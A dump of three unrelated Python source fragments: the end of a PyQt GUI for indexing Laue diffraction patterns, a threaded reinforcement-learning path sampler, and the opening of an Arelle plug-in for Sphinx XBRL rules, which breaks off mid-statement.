print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
print("No IMAGE file could be found for the selected pixel")
return
w = MyPopup_image_v1(ix, iy, path, Data, ccd_label,
self.predict_single_file_nodialog, image_no,
self.detectorparameters)
w.show()
self.popups.append(w)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
except:
return
elif event123.button == 3:
ix, iy = event123.xdata, event123.ydata
try:
## read the saved COR file and extract exp spots info.## avoid zero index problem
ix = int(round(ix))
iy = int(round(iy))
try:
if iy == 0 and ix == 0:
image_no = 0
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
# image_no = int(ix*iy+(iy-1)-1)
index_plotfnc = int(self.matrix_plot.currentText())-1
rotation_matrix = self.rotation_matrix[index_plotfnc][0][image_no,:,:]
mat_glob_plotfnc = self.mat_global[index_plotfnc][0][image_no]
path = os.path.normpath(self.filenm[image_no].decode())
files = self.cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
print(self.cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor")
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
print("No COR file could be found for the selected pixel")
return
if mat_glob_plotfnc == 1:
material_=self.material_
tolerance_add = float(self.tolerance.text())
elif mat_glob_plotfnc == 2:
material_=self.material1_
tolerance_add = float(self.tolerance1.text())
else:
print("No Material is indexed for this pixel")
material_ = None
tolerance_add = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
if np.all(rotation_matrix==0):
material_ = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("No rotation matrix found")
if material_ != None:
sim_twotheta, sim_chi, sim_energy, sim_hkl, \
list_spots, residues, theo_index = simulate_spots(rotation_matrix,
material_, self.emax, self.emin,
dict_dp['detectorparameters'], dict_dp,
tolerance_add, data_theta*2.0,
data_chi)
if len(sim_twotheta) == 0:
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("Nothing simulated")
w = MyPopup_image(data_theta, data_chi, intensity, sim_twotheta, sim_chi, sim_energy,
sim_hkl, ix, iy, files,
list_spots, residues, theo_index, rotation_matrix)
w.show()
self.popups.append(w)
print('chosen pixel coords are x = %d, y = %d'%(ix, iy))
except:
print("Error occured")
return
else:
print("Right Left for plotting the Indexation results; Left double click (or middle mouse) for Raw Laue patter and left click drag for lasso")
def update_data_mp1212(self):
if not self._outputs_queue.empty():
self.timermp1212.blockSignals(True)
n_range = self._outputs_queue.qsize()
for _ in range(n_range):
r_message_mpdata = self._outputs_queue.get()
strain_matrix_mpdata, strain_matrixs_mpdata, rotation_matrix_mpdata, col_mpdata, \
colx_mpdata, coly_mpdata, match_rate_mpdata, mat_global_mpdata, \
cnt_mpdata, meta_mpdata, files_treated_mpdata, spots_len_mpdata, \
iR_pixel_mpdata, fR_pixel_mpdata, best_match_mpdata, check_mpdata = r_message_mpdata
for i_mpdata in files_treated_mpdata:
self.files_treated.append(i_mpdata)
for intmat_mpdata in range(int(self.ubmat.text())):
self.check[cnt_mpdata,intmat_mpdata] = check_mpdata[cnt_mpdata,intmat_mpdata]
self.mat_global[intmat_mpdata][0][cnt_mpdata] = mat_global_mpdata[intmat_mpdata][0][cnt_mpdata]
self.strain_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrix_mpdata[intmat_mpdata][0][cnt_mpdata,:,:]
self.strain_matrixs[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrixs_mpdata[intmat_mpdata][0][cnt_mpdata,:,:]
self.rotation_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = rotation_matrix_mpdata[intmat_mpdata][0][cnt_mpdata,:,:]
self.col[intmat_mpdata][0][cnt_mpdata,:] = col_mpdata[intmat_mpdata][0][cnt_mpdata,:]
self.colx[intmat_mpdata][0][cnt_mpdata,:] = colx_mpdata[intmat_mpdata][0][cnt_mpdata,:]
self.coly[intmat_mpdata][0][cnt_mpdata,:] = coly_mpdata[intmat_mpdata][0][cnt_mpdata,:]
self.match_rate[intmat_mpdata][0][cnt_mpdata] = match_rate_mpdata[intmat_mpdata][0][cnt_mpdata]
self.spots_len[intmat_mpdata][0][cnt_mpdata] = spots_len_mpdata[intmat_mpdata][0][cnt_mpdata]
self.iR_pix[intmat_mpdata][0][cnt_mpdata] = iR_pixel_mpdata[intmat_mpdata][0][cnt_mpdata]
self.fR_pix[intmat_mpdata][0][cnt_mpdata] = fR_pixel_mpdata[intmat_mpdata][0][cnt_mpdata]
self.best_match[intmat_mpdata][0][cnt_mpdata] = best_match_mpdata[intmat_mpdata][0][cnt_mpdata]
if self.use_previous_UBmatrix_name:
try:
#Perhaps save only the best matching rate UB matricies in the file, instead of all UB matricies
#Or select only the best UB matricies when opening the file in propose_UBmatrix function
## calculate average matching rate and save it
avg_match_rate1 = [[] for i in range(int(self.ubmat.text()))]
for intmat_mpdata in range(int(self.ubmat.text())):
avg_match_rate = []
for j in self.match_rate[intmat_mpdata][0][:]:
if j != 0:
avg_match_rate.append(j)
avg_match_rate1[intmat_mpdata].append(np.median(avg_match_rate))
np.savez_compressed(self.model_direc+'//rotation_matrix_indexed_1.npz',
self.rotation_matrix, self.mat_global,
self.match_rate, avg_match_rate1)
except:
print("Warning : Error saving the NPZ file; nothing to worry")
## update plot now
self.update_plot()
self.timermp1212.blockSignals(False)
def plot_pcv1(self):
if self.use_previous_UBmatrix_name:
np.savez_compressed(self.model_direc+'//rotation_matrix_indexed_1.npz', self.rotation_matrix, self.mat_global, self.match_rate, 0.0)
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
cond_mode = self.matrix_plot_tech.currentText()
# =============================================================================
# ## Multi-processing routine
# =============================================================================
## Number of files to generate
grid_files = np.zeros((self.lim_x,self.lim_y))
self.filenm = np.chararray((self.lim_x,self.lim_y), itemsize=1000)
grid_files = grid_files.ravel()
self.filenm = self.filenm.ravel()
count_global = self.lim_x * self.lim_y
if self.ccd_label.currentText() == "Cor" or self.ccd_label.currentText() == "cor":
format_file = "cor"
else:
format_file = dictLT.dict_CCD[self.ccd_label.currentText()][7]
list_of_files = glob.glob(self.filenameDirec+'//'+self.experimental_prefix.text()+'*.'+format_file)
## sort files
## TypeError: '<' not supported between instances of 'str' and 'int'
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
if len(list_of_files) == count_global:
for ii in range(len(list_of_files)):
grid_files[ii] = ii
self.filenm[ii] = list_of_files[ii]
else:
print("expected "+str(count_global)+" files based on the XY grid ("+str(self.lim_x)+","+str(self.lim_y)+") defined by user")
print("But found "+str(len(list_of_files))+" files (either all data is not written yet or maybe XY grid definition is not proper)")
digits = len(str(count_global))
digits = max(digits,4)
for ii in range(count_global):
text = str(ii)
if ii < 10000:
string = text.zfill(4)
else:
string = text.zfill(5)
file_name_temp = self.filenameDirec+'//'+self.experimental_prefix.text()+string+'.'+format_file
## store it in a grid
self.filenm[ii] = file_name_temp
## access grid files to process with multi-thread
# self.check = np.zeros((count_global,int(self.ubmat.text())))
# =============================================================================
try:
blacklist = self.blacklist_file[0]
except:
blacklist = None
### Create a COR directory to be loaded in LaueTools
self.cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if format_file in ['cor',"COR","Cor"]:
self.cor_file_directory = self.filenameDirec
if not os.path.exists(self.cor_file_directory):
os.makedirs(self.cor_file_directory)
# while True:
if cond_mode == "Sequential":
self.predict_preprocess(cnt=self.cnt,
rotation_matrix=self.rotation_matrix,
strain_matrix=self.strain_matrix,
strain_matrixs=self.strain_matrixs,
col=self.col,
colx=self.colx,
coly=self.coly,
match_rate=self.match_rate,
spots_len=self.spots_len,
iR_pix=self.iR_pix,
fR_pix=self.fR_pix,
best_match = self.best_match,
mat_global=self.mat_global,
check=self.check,
detectorparameters=self.detectorparameters,
pixelsize=self.pixelsize,
angbins=self.angbins,
classhkl=self.classhkl,
hkl_all_class0=self.hkl_all_class0,
hkl_all_class1=self.hkl_all_class1,
emin=self.emin,
emax=self.emax,
material_=self.material_,
material1_=self.material1_,
symmetry=self.symmetry,
symmetry1=self.symmetry1,
lim_x= self.lim_x,
lim_y=self.lim_y,
strain_calculation=self.strain_calculation,
ind_mat=self.ind_mat, ind_mat1=self.ind_mat1,
model_direc=self.model_direc, tolerance=float(self.tolerance.text()),
tolerance1=float(self.tolerance1.text()),
matricies=int(self.ubmat.text()), ccd_label=self.ccd_label.currentText(),
filename_bkg=None, #self.filenamebkg,
intensity_threshold=float(self.intensity_threshold.text()),
boxsize=int(self.boxsize.text()),bkg_treatment=self.bkg_treatment.text(),
filenameDirec=self.filenameDirec,
experimental_prefix=self.experimental_prefix.text(),
blacklist_file =blacklist,
text_file=None,
files_treated=self.files_treated,
try_previous1=True,
wb = self.wb,
temp_key = self.temp_key,
cor_file_directory=self.cor_file_directory,
mode_spotCycle1 = self.mode_spotCycle,
softmax_threshold_global123 = self.softmax_threshold_global,
mr_threshold_global123=self.mr_threshold_global,
cap_matchrate123=self.cap_matchrate,
tolerance_strain123=self.tolerance_strain,
tolerance_strain1231=self.tolerance_strain1,
NumberMaxofFits123=self.NumberMaxofFits,
fit_peaks_gaussian_global123=self.fit_peaks_gaussian_global,
FitPixelDev_global123=self.FitPixelDev_global,
coeff123 = self.coeff,
coeff_overlap=self.coeff_overlap,
material0_limit=self.material0_limit,
material1_limit=self.material1_limit,
use_previous_UBmatrix_name=self.use_previous_UBmatrix_name,
material_phase_always_present = self.material_phase_always_present,
crystal=self.crystal,
crystal1=self.crystal1,
strain_free_parameters=self.strain_free_parameters)
elif cond_mode == "MultiProcessing":
try_prevs = False
if self.mode_spotCycle == "beamtime":
try_prevs = True
valu12 = [[self.filenm[ii].decode(), ii,
self.rotation_matrix,
self.strain_matrix,
self.strain_matrixs,
self.col,
self.colx,
self.coly,
self.match_rate,
self.spots_len,
self.iR_pix,
self.fR_pix,
self.best_match,
self.mat_global,
self.check,
self.detectorparameters,
self.pixelsize,
self.angbins,
self.classhkl,
self.hkl_all_class0,
self.hkl_all_class1,
self.emin,
self.emax,
self.material_,
self.material1_,
self.symmetry,
self.symmetry1,
self.lim_x,
self.lim_y,
self.strain_calculation,
self.ind_mat, self.ind_mat1,
self.model_direc, float(self.tolerance.text()),
float(self.tolerance1.text()),
int(self.ubmat.text()), self.ccd_label.currentText(),
None,
float(self.intensity_threshold.text()),
int(self.boxsize.text()),self.bkg_treatment.text(),
self.filenameDirec,
self.experimental_prefix.text(),
blacklist,
None,
self.files_treated,
try_prevs, ## try previous is kept true, incase if its stuck in loop
self.wb,
self.temp_key,
self.cor_file_directory,
self.mode_spotCycle,
self.softmax_threshold_global,
self.mr_threshold_global,
self.cap_matchrate,
self.tolerance_strain,
self.tolerance_strain1,
self.NumberMaxofFits,
self.fit_peaks_gaussian_global,
self.FitPixelDev_global,
self.coeff,
self.coeff_overlap,
self.material0_limit,
self.material1_limit,
self.use_previous_UBmatrix_name,
self.material_phase_always_present,
self.crystal,
self.crystal1,
self.strain_free_parameters] for ii in range(count_global)]
chunks = chunker_list(valu12, self.ncpu)
chunks_mp = list(chunks)
meta = {'t1':time.time()}
for ijk in range(int(self.ncpu)):
self._inputs_queue.put((chunks_mp[ijk], self.ncpu, meta))
if cond_mode == "MultiProcessing":
print("Launched all processes")
def plot_btn_stop(self):
if self.matrix_plot_tech.currentText() == "MultiProcessing":
self.timermp1212.blockSignals(False)
run_flag = multip.Value('I', False)
while not self._outputs_queue.empty():
n_range = self._outputs_queue.qsize()
for _ in range(n_range):
continue
print("Flag for mp module: ",run_flag)
time.sleep(0.1)
self.timermp1212.stop()
self.cnt = 1
self.run = False
self.btn_config.setEnabled(True)
self.btn_stop.setEnabled(False)
self.btn_save.setEnabled(True)
def getfiles(self):
self.modelDirec = QFileDialog.getExistingDirectory(self, 'Select Folder in which model files are located')
def getfiles1(self):
self.filenameDirec = QFileDialog.getExistingDirectory(self, 'Select Folder in which Experimental data is or will be stored')
def getfileModel(self):
self.filenameModel = QFileDialog.getOpenFileName(self, 'Select the model weights H5 or HDF5 file')
def predict_preprocess(self,cnt,rotation_matrix,strain_matrix,strain_matrixs,
col,colx,coly,match_rate,spots_len,iR_pix,fR_pix,best_match,mat_global,
check,detectorparameters,pixelsize,angbins,
classhkl, hkl_all_class0, hkl_all_class1, emin, emax,
material_, material1_, symmetry, symmetry1,lim_x,lim_y,
strain_calculation, ind_mat, ind_mat1,
model_direc=None, tolerance =None, tolerance1 =None,
matricies=None, ccd_label=None,
filename_bkg=None,intensity_threshold=None,
boxsize=None,bkg_treatment=None,
filenameDirec=None, experimental_prefix=None,
blacklist_file =None, text_file=None, files_treated=None,try_previous1=False,
wb=None, temp_key=None, cor_file_directory=None, mode_spotCycle1=None,
softmax_threshold_global123=None,mr_threshold_global123=None,cap_matchrate123=None,
tolerance_strain123=None,tolerance_strain1231=None,NumberMaxofFits123=None,fit_peaks_gaussian_global123=None,
FitPixelDev_global123=None, coeff123=None,coeff_overlap=None,
material0_limit=None, material1_limit=None, use_previous_UBmatrix_name=None,
material_phase_always_present=None, crystal=None, crystal1=None, strain_free_parameters=None):
if ccd_label in ["Cor", "cor"]:
format_file = "cor"
else:
format_file = dictLT.dict_CCD[ccd_label][7]
list_of_files = glob.glob(filenameDirec+'//'+experimental_prefix+'*.'+format_file)
## sort files
## TypeError: '<' not supported between instances of 'str' and 'int'
list_of_files.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
for files in list_of_files:
print("# Predicting for "+ files)
self.update_plot()
call_global()
peak_detection_error = False
if self.run == False:
print("Analysis stopped")
break
if files in files_treated:
continue
files_treated.append(files)
if files.split(".")[-1] != "cor":
CCDLabel=ccd_label
seednumber = "Experimental "+CCDLabel+" file"
try:
out_name = blacklist_file
except:
out_name = None
if bkg_treatment == None:
bkg_treatment = "A-B"
try:
### Max space = space between pixles
#print(CCDLabel)
peak_XY = RMCCD.PeakSearch(
files,
stackimageindex = -1,
CCDLabel=CCDLabel,
NumberMaxofFits=NumberMaxofFits123,
PixelNearRadius=10,
removeedge=2,
IntensityThreshold=intensity_threshold,
local_maxima_search_method=0,
boxsize=boxsize,
position_definition=1,
verbose=0,
fit_peaks_gaussian=fit_peaks_gaussian_global123,
xtol=0.001,
FitPixelDev=FitPixelDev_global123,
return_histo=0,
# Saturation_value=1e10, # to be merged in CCDLabel
# Saturation_value_flatpeak=1e10,
MinIntensity=0,
PeakSizeRange=(0.65,200),
write_execution_time=1,
Data_for_localMaxima = "auto_background",
formulaexpression=bkg_treatment,
Remove_BlackListedPeaks_fromfile=out_name,
reject_negative_baseline=True,
Fit_with_Data_for_localMaxima=False,
maxPixelDistanceRejection=15.0,
)
peak_XY = peak_XY[0]#[:,:2] ##[2] Integer peak lists
except:
print("Error in Peak detection for "+ files)
for intmat in range(matricies):
rotation_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrixs[intmat][0][self.cnt,:,:] = np.zeros((3,3))
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
match_rate[intmat][0][self.cnt] = 0
mat_global[intmat][0][self.cnt] = 0
cnt += 1
self.cnt += 1
peak_detection_error = True
continue
try:
s_ix = np.argsort(peak_XY[:, 2])[::-1]
peak_XY = peak_XY[s_ix]
except:
print("No peaks found for "+ files)
for intmat in range(matricies):
rotation_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrixs[intmat][0][self.cnt,:,:] = np.zeros((3,3))
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
match_rate[intmat][0][self.cnt] = 0
mat_global[intmat][0][self.cnt] = 0
cnt += 1
self.cnt += 1
peak_detection_error = True
continue
framedim = dictLT.dict_CCD[CCDLabel][0]
twicetheta, chi = Lgeo.calc_uflab(peak_XY[:,0], peak_XY[:,1], detectorparameters,
returnAngles=1,
pixelsize=pixelsize,
kf_direction='Z>0')
data_theta, data_chi = twicetheta/2., chi
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
#print(framedim)
#print(pixelsize)
dict_dp['peakX']=peak_XY[:,0]
dict_dp['peakY']=peak_XY[:,1]
dict_dp['intensity']=peak_XY[:,2]
CCDcalib = {"CCDLabel":CCDLabel,
"dd":detectorparameters[0],
"xcen":detectorparameters[1],
"ycen":detectorparameters[2],
"xbet":detectorparameters[3],
"xgam":detectorparameters[4],
"pixelsize": pixelsize}
path = os.path.normpath(files)
IOLT.writefile_cor(cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0], twicetheta,
chi, peak_XY[:,0], peak_XY[:,1], peak_XY[:,2],
param=CCDcalib, sortedexit=0)
elif files.split(".")[-1] == "cor":
seednumber = "Experimental COR file"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
if peak_detection_error:
continue
sorted_data = np.transpose(np.array([data_theta, data_chi]))
tabledistancerandom = np.transpose(GT.calculdist_from_thetachi(sorted_data, sorted_data))
codebars_all = []
if len(data_theta) == 0:
print("No peaks Found for : " + files)
for intmat in range(matricies):
rotation_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrix[intmat][0][self.cnt,:,:] = np.zeros((3,3))
strain_matrixs[intmat][0][self.cnt,:,:] = np.zeros((3,3))
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
match_rate[intmat][0][self.cnt] = 0
mat_global[intmat][0][self.cnt] = 0
cnt += 1
self.cnt += 1
continue
spots_in_center = np.arange(0,len(data_theta))
for i in spots_in_center:
spotangles = tabledistancerandom[i]
spotangles = np.delete(spotangles, i)# removing the self distance
codebars = np.histogram(spotangles, bins=angbins)[0]
# codebars = histogram1d(spotangles, range=[min(angbins),max(angbins)], bins=len(angbins)-1)
## normalize the same way as training data
max_codebars = np.max(codebars)
codebars = codebars/ max_codebars
codebars_all.append(codebars)
## reshape for the model to predict all spots at once
codebars = np.array(codebars_all)
## Do prediction of all spots at once
# prediction = model.predict(codebars)
prediction = predict(codebars, wb, temp_key)
max_pred = np.max(prediction, axis = 1)
class_predicted = np.argmax(prediction, axis = 1)
# print("Total spots attempted:"+str(len(spots_in_center)))
# print("Took "+ str(time.time()-strat_time_P)+" seconds to predict spots")
predicted_hkl123 = classhkl[class_predicted]
predicted_hkl123 = predicted_hkl123.astype(int)
#print(predicted_hkl123)
s_tth = data_theta * 2.
s_chi = data_chi
rotation_matrix1, mr_highest, mat_highest, \
strain_crystal, strain_sample, iR_pix1, \
fR_pix1, spots_len1, best_match1,\
check12 = predict_ubmatrix(seednumber, spots_in_center, classhkl,
hkl_all_class0,
hkl_all_class1, files,
s_tth1=s_tth,s_chi1=s_chi,
predicted_hkl1=predicted_hkl123,
class_predicted1=class_predicted,
max_pred1=max_pred,
emin=emin,emax=emax,
material_=material_,
material1_=material1_,
lim_y=lim_y, lim_x=lim_x,
cnt=self.cnt,
dict_dp=dict_dp,
rotation_matrix=self.rotation_matrix,
mat_global=self.mat_global,
strain_calculation=strain_calculation,
ind_mat=ind_mat,
ind_mat1=ind_mat1,
tolerance=tolerance,
tolerance1 =tolerance1,
matricies=matricies,
tabledistancerandom=tabledistancerandom,
text_file = text_file,
try_previous1=try_previous1,
mode_spotCycle = mode_spotCycle1,
softmax_threshold_global123=softmax_threshold_global123,
mr_threshold_global123=mr_threshold_global123,
cap_matchrate123=cap_matchrate123,
tolerance_strain123=tolerance_strain123,
tolerance_strain1231=tolerance_strain1231,
coeff123=coeff123,
coeff_overlap=coeff_overlap,
material0_limit=material0_limit,
material1_limit=material1_limit,
model_direc=model_direc,
use_previous_UBmatrix_name=use_previous_UBmatrix_name,
material_phase_always_present=material_phase_always_present,
match_rate=self.match_rate,
check=self.check[self.cnt,:],
crystal=crystal,
crystal1=crystal1,
angbins=angbins,
wb=wb, temp_key=temp_key,
strain_free_parameters=strain_free_parameters)
for intmat in range(matricies):
if len(rotation_matrix1[intmat]) == 0:
col[intmat][0][self.cnt,:] = 0,0,0
colx[intmat][0][self.cnt,:] = 0,0,0
coly[intmat][0][self.cnt,:] = 0,0,0
else:
# mat_global[intmat][0][self.cnt] = mat_highest[intmat][0]
self.mat_global[intmat][0][self.cnt] = mat_highest[intmat][0]
final_symm =symmetry
final_crystal = crystal
if mat_highest[intmat][0] == 1:
final_symm = symmetry
final_crystal = crystal
elif mat_highest[intmat][0] == 2:
final_symm = symmetry1
final_crystal = crystal1
symm_operator = final_crystal._hklsym
# strain_matrix[intmat][0][cnt,:,:] = strain_crystal[intmat][0]
# strain_matrixs[intmat][0][cnt,:,:] = strain_sample[intmat][0]
self.strain_matrix[intmat][0][self.cnt,:,:] = strain_crystal[intmat][0]
self.strain_matrixs[intmat][0][self.cnt,:,:] = strain_sample[intmat][0]
# rotation_matrix[intmat][0][cnt,:,:] = rotation_matrix1[intmat][0]
self.rotation_matrix[intmat][0][self.cnt,:,:] = rotation_matrix1[intmat][0]
col_temp = get_ipf_colour(rotation_matrix1[intmat][0], np.array([0., 0., 1.]), final_symm, symm_operator)
# col[intmat][0][cnt,:] = col_temp
self.col[intmat][0][self.cnt,:] = col_temp
col_tempx = get_ipf_colour(rotation_matrix1[intmat][0], np.array([1., 0., 0.]), final_symm, symm_operator)
# colx[intmat][0][cnt,:] = col_tempx
self.colx[intmat][0][self.cnt,:] = col_tempx
col_tempy = get_ipf_colour(rotation_matrix1[intmat][0], np.array([0., 1., 0.]), final_symm, symm_operator)
# coly[intmat][0][cnt,:] = col_tempy
self.coly[intmat][0][self.cnt,:] = col_tempy
# match_rate[intmat][0][cnt] = mr_highest[intmat][0]
self.match_rate[intmat][0][self.cnt] = mr_highest[intmat][0]
# spots_len[intmat][0][cnt] = spots_len1[intmat][0]
self.spots_len[intmat][0][self.cnt] = spots_len1[intmat][0]
# iR_pix[intmat][0][cnt] = iR_pix1[intmat][0]
self.iR_pix[intmat][0][self.cnt] = iR_pix1[intmat][0]
# fR_pix[intmat][0][cnt] = fR_pix1[intmat][0]
self.fR_pix[intmat][0][self.cnt] = fR_pix1[intmat][0]
# best_match[intmat][0][cnt] = best_match1
self.best_match[intmat][0][self.cnt] = best_match1[intmat][0]
self.check[self.cnt,intmat] = check12[intmat]
cnt += 1
self.cnt += 1
def toggle_selector(event):
print(' Key pressed.')
if event.key in ['Q', 'q'] and toggle_selector.RS.active:
print(' RectangleSelector deactivated.')
toggle_selector.RS.set_active(False)
if event.key in ['A', 'a'] and not toggle_selector.RS.active:
print(' RectangleSelector activated.')
toggle_selector.RS.set_active(True)
def toggle_selector1(event):
print(' Key pressed.')
if event.key in ['Q', 'q'] and toggle_selector.RS.active:
print(' LineSelector deactivated.')
toggle_selector.RS.set_active(False)
if event.key in ['A', 'a'] and not toggle_selector.RS.active:
print(' LineSelector activated.')
toggle_selector.RS.set_active(True)
def start():
""" start of GUI for module launch"""
# Handle high resolution displays:
# fixes same widgets size across different screens
if hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling, True)
if hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):
QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)
app = QApplication(sys.argv)
try:
screen = app.primaryScreen()
print('Screen: %s' % screen.name())
size = screen.size()
print('Size: %d x %d' % (size.width(), size.height()))
rect = screen.availableGeometry()
print('Available: %d x %d' % (rect.width(), rect.height()))
win = Window(rect.width()//2.5, rect.height()//1.2)
except:
win = Window()
win.show()
sys.exit(app.exec_())
if __name__ == "__main__":
start()
|
parallel_sampler.py
|
"""Author: Brandon Trabucco, Copyright 2019"""
import threading
import numpy as np
from mineral.core.samplers.sampler import Sampler
from mineral.core.samplers.path_sampler import PathSampler
class ParallelSampler(Sampler):
def __init__(
self,
*args,
num_threads=4,
max_path_length=256,
num_warm_up_paths=1024,
num_exploration_paths=32,
num_evaluation_paths=32,
**kwargs
):
Sampler.__init__(
self,
max_path_length=max_path_length,
num_warm_up_paths=num_warm_up_paths,
num_exploration_paths=num_exploration_paths,
num_evaluation_paths=num_evaluation_paths,
**kwargs)
self.num_threads = num_threads
self.inner_samplers = [
PathSampler(
*args,
max_path_length=max_path_length,
num_warm_up_paths=(num_warm_up_paths % num_threads + num_warm_up_paths // num_threads),
num_exploration_paths=(num_exploration_paths % num_threads + num_exploration_paths // num_threads),
num_evaluation_paths=(num_evaluation_paths % num_threads + num_evaluation_paths // num_threads),
**kwargs)]
for _i in range(1, num_threads):
self.inner_samplers.append(PathSampler(
*args,
max_path_length=max_path_length,
num_warm_up_paths=num_warm_up_paths//num_threads,
num_exploration_paths=num_exploration_paths//num_threads,
num_evaluation_paths=num_evaluation_paths//num_threads,
**kwargs))
lock = threading.Lock()
def increment_function():
lock.acquire()
self.increment()
lock.release()
for inner_sampler in self.inner_samplers:
inner_sampler.increment = increment_function
def collect(
self,
thread_function
):
reward_list = []
threads = [threading.Thread(
target=thread_function, args=(sampler, reward_list)) for sampler in self.inner_samplers]
for t in threads:
t.start()
for t in threads:
t.join()
return reward_list
def warm_up(
self,
render=False,
**render_kwargs
):
def thread_function(inner_sampler, output_list):
output_list.extend(inner_sampler.warm_up(render=render, **render_kwargs))
return self.collect(thread_function)
def explore(
self,
render=False,
**render_kwargs
):
def thread_function(inner_sampler, output_list):
output_list.extend(inner_sampler.explore(render=render, **render_kwargs))
return self.collect(thread_function)
def evaluate(
self,
render=False,
**render_kwargs
):
def thread_function(inner_sampler, output_list):
output_list.extend(inner_sampler.evaluate(render=render, **render_kwargs))
return self.collect(thread_function)
|
__init__.py
|
'''
sphinx is an example of a package plug-in to both GUI menu and command line/web service
that compiles a Sphinx Rules file into an XBRL Formula Linkbase either to be saved or to
be directly executed by Arelle XBRL Formula processing.
This plug-in is a python package, and can be loaded by referencing the containing
directory (usually, "sphinx"), and selecting this "__init__.py" file within the sphinx
directory (such as in a file chooser).
(c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved.
Mark V copyright applies to this software, which is licensed according to the terms of Arelle(r).
Sphinx is a Rules Language for XBRL described by a Sphinx 2 Primer
(c) Copyright 2012 CoreFiling, Oxford UK.
Sphinx copyright applies to the Sphinx language, not to this software.
Mark V Systems conveys neither rights nor license for the Sphinx language.
'''
import time, os, io, sys
from arelle.ModelValue import qname
from arelle import XmlUtil
logMessage = None
def sphinxFilesDialog(cntlr):
# get multiple file names of the sphinx files
sphinxFiles = cntlr.uiFileDialog("open",
multiple=True, # expect multiple sphinx files
title=_("arelle - Open sphinx rules files"),
initialdir=cntlr.config.setdefault("sphinxRulesFileDir","."),
filetypes=[(_("Sphinx files .xsr"), "*.xsr"), (_("Sphinx archives .xrb"), "*.xrb")],
defaultextension=".xsr")
if not sphinxFiles:
return None
cntlr.config["sphinxRulesFileDir"] = os.path.dirname(sphinxFiles[0])
cntlr.saveConfig()
return sphinxFiles
def generatedFormulasDirDialog(cntlr):
from tkinter.filedialog import askdirectory
generatedFormulasDir = askdirectory(parent=cntlr.parent,
initialdir=cntlr.config.setdefault("sphinxGeneratedFormulasDir","."),
title='Please select a directory for formulas generated from sphinx')
cntlr.config["sphinxGeneratedFormulasDir"] = generatedFormulasDir
cntlr.saveConfig()
return generatedFormulasDir
def sphinxFilesOpenMenuEntender(cntlr, menu):
def sphinxFileMenuCommand():
from arelle import ModelDocument
import os, sys, traceback
if not cntlr.modelManager.modelXbrl or cntlr.modelManager.modelXbrl.modelDocument.type not in (
